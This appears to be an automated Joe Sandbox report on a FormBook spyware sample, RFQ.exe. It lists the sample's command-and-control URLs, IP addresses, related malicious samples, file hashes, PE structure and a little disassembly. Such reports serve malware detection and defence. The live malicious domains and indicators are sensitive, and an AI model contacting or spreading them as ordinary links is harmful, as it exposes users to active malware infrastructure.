http://www.evoo.website/293d/?W638b4U=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGTfIU/JrlV2z9a9IQeyVbD4LqpyZAtBKJ4EaDgMR1jS91tA==&Xll=50hLc0Hhy | false | | unknown
http://www.wukong.college/9ezc/ | false | | unknown
http://www.astorg-group.info/vdvc/?W638b4U=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRcKpdTLsadcBjXT18ECqhEbYKAo2NhS9FS63soq1W+eFfLA==&Xll=50hLc0Hhy | false | | unknown
http://www.kdtzhb.top/1iqa/ | false | | unknown
http://www.bio-thymus.com/ezyn/?W638b4U=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMJKMiK3EdvOJmV73Jy75+c2YHLSLsa6dhHSYwd0sxfTHy3A==&Xll=50hLc0Hhy | false | | unknown
http://www.migraine-massages.pro/ym43/ | false | | unknown
http://www.vnxoso88.art/d26j/ | false | | unknown
http://www.vnxoso88.art/d26j/?W638b4U=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN1iJSRG9yUGoI2tAgRBkFBhEuTNxXB6UGYS0PM3LmZFBqDA==&Xll=50hLc0Hhy | false | | unknown
http://www.yushaliu.online/fjsq/ | false | | unknown
http://www.yushaliu.online/fjsq/?W638b4U=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSbA/Vc9/aSgY+IqBazWG3FiJEJ5+81Lg8Vy8GcHYtnLYhkw==&Xll=50hLc0Hhy | false | | unknown
http://www.astorg-group.info/vdvc/ | false | | unknown
http://www.pluribiz.life/afcr/ | false | | unknown
http://www.bio-thymus.com/ezyn/ | false | | unknown
http://www.kdtzhb.top/1iqa/?W638b4U=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQjSyqzKDi3Wbpu+VrwdU4dvabDPmYf5pusJWuBQDberj5Ig==&Xll=50hLc0Hhy | false | | unknown
http://www.fiqsth.vip/0m8a/?W638b4U=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAr/vHodlZDokX5k5j35YEbCksENzyPa61ZxusEcT508vfTQ==&Xll=50hLc0Hhy | false | | unknown
http://www.marketprediction.app/ucmb/ | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.yushaliu.online/sk-logabpstatus.php?a=NlFjSUtLSnllS1JFblBWQWdKcys3ZzRjSzh6dkNqL1JnUEMzQWh | net.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://dts.gnpge.com | enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://whois.gandi.net/en/results?search=4nk.education | net.exe, 00000004.00000002.4573862454.0000000004286000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000002FE6000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.marketprediction.app | enUILRNjDql.exe, 00000006.00000002.4574678267.0000000004F25000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.gandi.net/en/domain | net.exe, 00000004.00000002.4573862454.0000000004286000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000004BF2000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000002FE6000.00000004.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://whois.gandi.net/en/results?search=astorg-group.info | net.exe, 00000004.00000002.4573862454.0000000004BF2000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://ac.ecosia.org/autocomplete?q= | net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | net.exe, 00000004.00000002.4573862454.0000000004418000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.00000000045AA000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.000000000330A000.00000004.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.0000000003178000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.yushaliu.online/px.js?ch=1 | net.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
http://www.yushaliu.online/px.js?ch=2 | net.exe, 00000004.00000002.4575456522.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000002.4573150295.00000000042BE000.00000004.00000001.00040000.00000000.sdmp | false | | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | net.exe, 00000004.00000002.4575572230.000000000818E000.00000004.00000020.00020000.00000000.sdmp | false | | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
47.52.221.8 | www.wukong.college | United States | | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
128.65.195.180 | www.evoo.website | Switzerland | | 29222 | INFOMANIAK-ASCH | false
23.106.59.18 | ppp84k45ss7ehy8ypic5x.limelightcdn.com | United Kingdom | | 205544 | LEASEWEB-UK-LON-11GB | false
199.59.243.227 | 77980.bodis.com | United States | | 395082 | BODIS-NJUS | false
217.70.184.50 | webredir.vip.gandi.net | France | | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | false
208.91.197.27 | www.yushaliu.online | Virgin Islands (BRITISH) | | 40034 | CONFLUENCE-NETWORK-INCVG | false
209.74.64.58 | www.pluribiz.life | United States | | 31744 | MULTIBAND-NEWHOPEUS | false
3.33.130.190 | fiqsth.vip | United States | | 8987 | AMAZONEXPANSIONGB | false
47.242.89.146 | www.kdtzhb.top | United States | | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1555881
Start date and time: 2024-11-14 15:38:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: RFQ.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@17/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 52
• Number of non-executed functions: 293
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: RFQ.exe
Time | Type | Description
09:40:02 | API Interceptor | 13180408x Sleep call for process: net.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
47.52.221.8 | statement of accounts.exe | malicious | FormBook | www.wukong.college/9ezc/
47.52.221.8 | Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | FormBook | www.wukong.college/4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM
47.52.221.8 | RFQ.exe | malicious | FormBook | www.wukong.college/9ezc/
47.52.221.8 | RFQ.exe | malicious | FormBook | www.wukong.college/9ezc/
47.52.221.8 | XhAQ0Rk63O.exe | malicious | FormBook | www.wukong.college/9ezc/
128.65.195.180 | statement of accounts.exe | malicious | FormBook | www.evoo.website/293d/
128.65.195.180 | RFQ.exe | malicious | FormBook | www.evoo.website/293d/
128.65.195.180 | RFQ.exe | malicious | FormBook | www.evoo.website/293d/
128.65.195.180 | XhAQ0Rk63O.exe | malicious | FormBook | www.evoo.website/293d/
128.65.195.180 | TT Application copy.exe | malicious | FormBook | www.airbnbneuchatel.com/0zfk/
128.65.195.180 | Inquiry Second Reminder.exe | malicious | FormBook | www.spx21.com/dz25/?9rz0r6F8=IXjUS8uTLEXXc4IFKSk4QK94/u/v4rSLXrhItQqacAC9jZYA+NiFbTAYaFgWrpFehgvY&RP=7nHTxl6
128.65.195.180 | LPOH2401-3172(Mr.Kem Sophea)-pdf.exe | malicious | FormBook | www.zimmerli.online/btrd/?E2MXNj=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT&bt-=XVJdUxa8
128.65.195.180 | PGiUp8uqGt.exe | malicious | FormBook | www.zimmerli.online/btrd/?2dz=odelT&-Z1dnr=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT
128.65.195.180 | LGSTXJeTc4.exe | malicious | FormBook | www.zimmerli.online/btrd/?bXUH_86P=TxZDFykb+0Hph0GWgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPqsFIgKb+U&lzud6=y6gL_DWH
128.65.195.180 | MVEjijPB3m.exe | malicious | FormBook | www.zimmerli.online/btrd/?7n=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&q6AhA=ORGpz4MpyH
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.pluribiz.life | statement of accounts.exe | malicious | FormBook | 209.74.64.58
www.pluribiz.life | RFQ.exe | malicious | FormBook | 209.74.64.58
www.pluribiz.life | Arrival Notice.exe | malicious | FormBook | 209.74.64.58
www.pluribiz.life | RFQ.exe | malicious | FormBook | 209.74.64.58
www.pluribiz.life | XhAQ0Rk63O.exe | malicious | FormBook | 209.74.64.58
www.pluribiz.life | MV Sunshine.exe | malicious | FormBook | 209.74.64.58
www.pluribiz.life | #10302024.exe | malicious | FormBook | 209.74.64.58
webredir.vip.gandi.net | statement of accounts.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | XhAQ0Rk63O.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | SWIFT.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | #10302024.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | rPO-000172483.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | PO-000041522.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | Doc 784-01965670.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | rDebitadvice22_10_2024.exe | malicious | FormBook | 217.70.184.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
INFOMANIAK-ASCH | statement of accounts.exe | malicious | FormBook | 128.65.195.180
INFOMANIAK-ASCH | RFQ.exe | malicious | FormBook | 128.65.195.180
INFOMANIAK-ASCH | RFQ.exe | malicious | FormBook | 128.65.195.180
INFOMANIAK-ASCH | XhAQ0Rk63O.exe | malicious | FormBook | 128.65.195.180
INFOMANIAK-ASCH | https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yL | malicious | Ratty | 128.65.195.91
INFOMANIAK-ASCH | https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yL | malicious | Ratty | 128.65.195.91
INFOMANIAK-ASCH | z95ordemdecomprapdfx4672xx.exe | malicious | FormBook | 84.16.66.164
INFOMANIAK-ASCH | Doc.exe | malicious | Sliver | 128.65.199.135
INFOMANIAK-ASCH | Nowe zam#U00f3wienie zakupu pdf.exe | malicious | FormBook | 84.16.66.164
INFOMANIAK-ASCH | TT Application copy.exe | malicious | FormBook | 128.65.195.180
BODIS-NJUS | PO-DC13112024_pdf.vbs | malicious | Unknown | 199.59.243.227
BODIS-NJUS | statement of accounts.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | RFQ.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | Arrival Notice.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | 8dPlV2lT8o.exe | malicious | Simda Stealer | 199.59.243.227
BODIS-NJUS | 7ObLFE2iMK.exe | malicious | Simda Stealer | 199.59.243.227
BODIS-NJUS | UMwpXhA46R.exe | malicious | Simda Stealer | 199.59.243.227
BODIS-NJUS | 1fWgBXPgiT.exe | malicious | Simda Stealer | 199.59.243.227
BODIS-NJUS | arxtPs1STE.exe | malicious | Simda Stealer | 199.59.243.227
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | yakuza.i586.elf | malicious | Mirai | 47.244.187.149
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | botnet.x86.elf | malicious | Mirai, Moobot | 8.212.195.111
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | http://software.oldversion.com/download.php?f=YTo1OntzOjQ6InRpbWUiO2k6MTczMTQ4OTAwMjtzOjI6ImlkIjtpOjEzODk4O3M6NDoiZmlsZSI7czo0MzoicGRmY3JlYXRvci0xLTYtMi1QREZDcmVhdG9yLTFfNl8yX3NldHVwLmV4ZSI7czozOiJ1cmwiO3M6NTA6Imh0dHA6Ly93d3cub2xkdmVyc2lvbi5jb20vd2luZG93cy9wZGZjcmVhdG9yLTEtNi0yIjtzOjQ6InBhc3MiO3M6MzI6IjMwYzExNzY3MTEwNWY3MjhjYjA0YzU2ZjkzYTc1YTRjIjt9 | malicious | Unknown | 47.253.61.56
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | statement of accounts.exe | malicious | FormBook | 47.242.89.146
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | FormBook | 47.52.221.8
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | inter.exe | malicious | Unknown | 8.210.59.12
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | inter.exe | malicious | Unknown | 8.210.59.12
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | RFQ.exe | malicious | FormBook | 47.242.89.146
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://gerneva.com | malicious | Unknown | 47.251.24.229
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | sora.sh4.elf | malicious | Mirai | 147.139.148.16
LEASEWEB-UK-LON-11GB | statement of accounts.exe | malicious | FormBook | 23.106.59.18
LEASEWEB-UK-LON-11GB | RFQ.exe | malicious | FormBook | 23.106.59.18
LEASEWEB-UK-LON-11GB | XhAQ0Rk63O.exe | malicious | FormBook | 23.106.59.18
LEASEWEB-UK-LON-11GB | SecuriteInfo.com.FileRepMalware.27261.32754.exe | malicious | Unknown | 23.106.59.52
LEASEWEB-UK-LON-11GB | SecuriteInfo.com.ELF.Agent-AIN.28488.28782.elf | malicious | Mirai | 95.168.183.162
LEASEWEB-UK-LON-11GB | SecuriteInfo.com.FileRepMalware.15071.2577.exe | malicious | Unknown | 23.106.59.18
LEASEWEB-UK-LON-11GB | 5672D5B80770DEB68BF2435FEF12D521C04CE012250CC.exe | malicious | Unknown | 23.106.59.52
LEASEWEB-UK-LON-11GB | F85362FA96806CE4FF93B8A49E0E74F65DEA0B759AE87.exe | malicious | Unknown | 23.106.59.52
LEASEWEB-UK-LON-11GB | d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe | malicious | Unknown | 23.106.59.52
LEASEWEB-UK-LON-11GB | d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exe | malicious | Unknown | 23.106.59.52
No context
No context
Process: C:\Windows\SysWOW64\net.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\RFQ.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.995173941472522
Encrypted: true
SSDEEP: 6144:O2V/PcU70wKG+Btq37WYC2JBCF5CdRlaLKZi0Sz9eIUSQHsoJGm3aGQa8nU:dBPxuI33CSmw8LyJSzWSdoJR3aRW
MD5: EA7E1B5B5094BB0870299EFC336B0042
SHA1: A4C3FA5FB9CB08D44BD5DB230B233F3E00F5EF00
SHA-256: E32F7A5BD208F355D124CD8568F411DF77A65E29405A10405942350F36862092
SHA-512: 956545A1975B353C157A6BA7C6CEB97A0D69B5CDDA885891B75ADE7C5A5D256B5102CFF169C54D58112445FDD64FF8F5DBD9C8BDCCC9C8FEEA44B7B364C1A1F6
Malicious: false
Reputation: low
                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):7.1503033241697915
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                  File name:RFQ.exe
                                                                                                                                                  File size:1'217'024 bytes
                                                                                                                                                  MD5:ecd96717ac8201e049cfa4ca22e88dec
                                                                                                                                                  SHA1:51f5f84261750137131d01824bb817a837441af7
                                                                                                                                                  SHA256:67f01ea4fc25ae9f1a4ab574e0c474bd31ae7d561abc545bb65ca86d26f3daa5
                                                                                                                                                  SHA512:30aeb810de9c33963478d4cc67bd04b65021ea1458b385e2f4cebe610f8149fcb9ad0fc30e6e23630a77db3a8659ecdf30b9f6eba032455b23b2925a1d21588d
                                                                                                                                                  SSDEEP:24576:mtb20pkaCqT5TBWgNQ7aUrLWNYCccT0GoH6A:TVg5tQ7aUrLB1US5
                                                                                                                                                  TLSH:4645DF1273DEC361C3B25273BA667741AEBB782506A1F96B2FD4093CF920122525E773
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                                                                                  Icon Hash:aaf3e3e3938382a0
                                                                                                                                                  Entrypoint:0x425f74
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x6735E622 [Thu Nov 14 11:59:30 2024 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:5
                                                                                                                                                  OS Version Minor:1
                                                                                                                                                  File Version Major:5
                                                                                                                                                  File Version Minor:1
                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                                                                                  Instruction
                                                                                                                                                  call 00007F355C8C454Fh
                                                                                                                                                  jmp 00007F355C8B7564h
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  push edi
                                                                                                                                                  push esi
                                                                                                                                                  mov esi, dword ptr [esp+10h]
                                                                                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                                                                                  mov eax, ecx
                                                                                                                                                  mov edx, ecx
                                                                                                                                                  add eax, esi
                                                                                                                                                  cmp edi, esi
                                                                                                                                                  jbe 00007F355C8B76EAh
                                                                                                                                                  cmp edi, eax
                                                                                                                                                  jc 00007F355C8B7A4Eh
                                                                                                                                                  bt dword ptr [004C0158h], 01h
                                                                                                                                                  jnc 00007F355C8B76E9h
                                                                                                                                                  rep movsb
                                                                                                                                                  jmp 00007F355C8B79FCh
                                                                                                                                                  cmp ecx, 00000080h
                                                                                                                                                  jc 00007F355C8B78B4h
                                                                                                                                                  mov eax, edi
                                                                                                                                                  xor eax, esi
                                                                                                                                                  test eax, 0000000Fh
                                                                                                                                                  jne 00007F355C8B76F0h
                                                                                                                                                  bt dword ptr [004BA370h], 01h
                                                                                                                                                  jc 00007F355C8B7BC0h
                                                                                                                                                  bt dword ptr [004C0158h], 00000000h
                                                                                                                                                  jnc 00007F355C8B788Dh
                                                                                                                                                  test edi, 00000003h
                                                                                                                                                  jne 00007F355C8B789Eh
                                                                                                                                                  test esi, 00000003h
                                                                                                                                                  jne 00007F355C8B787Dh
                                                                                                                                                  bt edi, 02h
                                                                                                                                                  jnc 00007F355C8B76EFh
                                                                                                                                                  mov eax, dword ptr [esi]
                                                                                                                                                  sub ecx, 04h
                                                                                                                                                  lea esi, dword ptr [esi+04h]
                                                                                                                                                  mov dword ptr [edi], eax
                                                                                                                                                  lea edi, dword ptr [edi+04h]
                                                                                                                                                  bt edi, 03h
                                                                                                                                                  jnc 00007F355C8B76F3h
                                                                                                                                                  movq xmm1, qword ptr [esi]
                                                                                                                                                  sub ecx, 08h
                                                                                                                                                  lea esi, dword ptr [esi+08h]
                                                                                                                                                  movq qword ptr [edi], xmm1
                                                                                                                                                  lea edi, dword ptr [edi+08h]
                                                                                                                                                  test esi, 00000007h
                                                                                                                                                  je 00007F355C8B7745h
                                                                                                                                                  bt esi, 03h
                                                                                                                                                  jnc 00007F355C8B7798h
                                                                                                                                                  movdqa xmm1, dqword ptr [esi+00h]
                                                                                                                                                  Programming Language:
                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                  • [ASM] VS2012 UPD4 build 61030
                                                                                                                                                  • [RES] VS2012 UPD4 build 61030
                                                                                                                                                  • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x60114 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x125000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x60114 | 0x60200 | 596cee3aca96a38d37ce47026a41c5f0 | False | 0.9316304657022106 | data | 7.902791634857268 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x125000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
